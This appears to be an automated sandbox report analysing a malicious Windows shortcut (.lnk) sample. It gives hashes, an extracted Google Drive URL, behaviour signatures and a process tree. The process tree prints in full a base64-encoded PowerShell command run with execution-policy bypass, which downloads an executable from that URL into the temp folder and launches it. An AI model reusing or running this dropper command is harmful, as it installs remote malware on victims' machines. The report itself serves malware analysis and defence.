Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
18-09-2024 21:36
Static task
static1
Behavioral task
behavioral1
Sample
ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk
Resource
win10v2004-20240802-en
General
-
Target
ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk
-
Size
3KB
-
MD5
ea037f858b767baef3eb6c9eff455c83
-
SHA1
1b91f976a4458c8c315fae6b731eb80b615fd3a3
-
SHA256
7e614a8b38ce81dc274032850bdc9e6cc41b80d6c0eaddcf5b1989add198a96b
-
SHA512
012b033aff2a3a35d54f0be5b32b1ea7b5599cff09d9ba7a25be4f20ca697a81618d68defee97ef5dd4cf31a966802a8637a570e4e050a97441d3c622211b3dd
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=17arYmcfomWk-aZSZP9P1qjMl442HppCm
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2112 powershell.exe 7 2112 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2808 powershell.exe 2112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 2112 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2460 wrote to memory of 2808 2460 cmd.exe 32 PID 2460 wrote to memory of 2808 2460 cmd.exe 32 PID 2460 wrote to memory of 2808 2460 cmd.exe 32 PID 2808 wrote to memory of 2660 2808 powershell.exe 33 PID 2808 wrote to memory of 2660 2808 powershell.exe 33 PID 2808 wrote to memory of 2660 2808 powershell.exe 33 PID 2660 wrote to memory of 2112 2660 cmd.exe 34 PID 2660 wrote to memory of 2112 2660 cmd.exe 34 PID 2660 wrote to memory of 2112 2660 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ea037f858b767baef3eb6c9eff455c83_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmD /c POwErshEll.exE -ex bypASS -EC IAALACAAKAAgACAACQBuAGUAdwAtAG8AQgBqAEUAYwBUAAkAIAAJAFMAWQBTAFQAZQBNAC4AbgBlAFQALgB3AEUAQgBDAGwASQBlAG4AVAAJACAACQApAC4ARABvAHcAbgBsAG8AQQBkAGYASQBMAEUAKAAgAAsAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxADcAYQByAFkAbQBjAGYAbwBtAFcAawAtAGEAWgBTAFoAUAA5AFAAMQBxAGoATQBsADQANAAyAEgAcABwAEMAbQAdICAAIAAgACwAIAAJAAkAHSAkAGUAbgB2ADoAVABFAG0AcABcAGMAYwBhAGcAdQBiAGIAdgB2AHYAYgBpAGQAZQAuAGUAeABlAB0gCQALACAAKQAgAAsAIAA7ACAACQAJAEkAbgBWAG8ASwBFAC0ASQBUAEUAbQAJAAsACQAdICQAZQBOAFYAOgBUAGUATQBQAFwAYwBjAGEAZwB1AGIAYgB2AHYAdgBiAGkAZABlAC4AZQB4AGUAHSA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c POwErshEll.exE -ex bypASS -EC IAALACAAKAAgACAACQBuAGUAdwAtAG8AQgBqAEUAYwBUAAkAIAAJAFMAWQBTAFQAZQBNAC4AbgBlAFQALgB3AEUAQgBDAGwASQBlAG4AVAAJACAACQApAC4ARABvAHcAbgBsAG8AQQBkAGYASQBMAEUAKAAgAAsAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxADcAYQByAFkAbQBjAGYAbwBtAFcAawAtAGEAWgBTAFoAUAA5AFAAMQBxAGoATQBsADQANAAyAEgAcABwAEMAbQAdICAAIAAgACwAIAAJAAkAHSAkAGUAbgB2ADoAVABFAG0AcABcAGMAYwBhAGcAdQBiAGIAdgB2AHYAYgBpAGQAZQAuAGUAeABlAB0gCQALACAAKQAgAAsAIAA7ACAACQAJAEkAbgBWAG8ASwBFAC0ASQBUAEUAbQAJAAsACQAdICQAZQBOAFYAOgBUAGUATQBQAFwAYwBjAGEAZwB1AGIAYgB2AHYAdgBiAGkAZABlAC4AZQB4AGUAHSA=3⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwErshEll.exE -ex bypASS -EC IAALACAAKAAgACAACQBuAGUAdwAtAG8AQgBqAEUAYwBUAAkAIAAJAFMAWQBTAFQAZQBNAC4AbgBlAFQALgB3AEUAQgBDAGwASQBlAG4AVAAJACAACQApAC4ARABvAHcAbgBsAG8AQQBkAGYASQBMAEUAKAAgAAsAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxADcAYQByAFkAbQBjAGYAbwBtAFcAawAtAGEAWgBTAFoAUAA5AFAAMQBxAGoATQBsADQANAAyAEgAcABwAEMAbQAdICAAIAAgACwAIAAJAAkAHSAkAGUAbgB2ADoAVABFAG0AcABcAGMAYwBhAGcAdQBiAGIAdgB2AHYAYgBpAGQAZQAuAGUAeABlAB0gCQALACAAKQAgAAsAIAA7ACAACQAJAEkAbgBWAG8ASwBFAC0ASQBUAEUAbQAJAAsACQAdICQAZQBOAFYAOgBUAGUATQBQAFwAYwBjAGEAZwB1AGIAYgB2AHYAdgBiAGkAZABlAC4AZQB4AGUAHSA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
-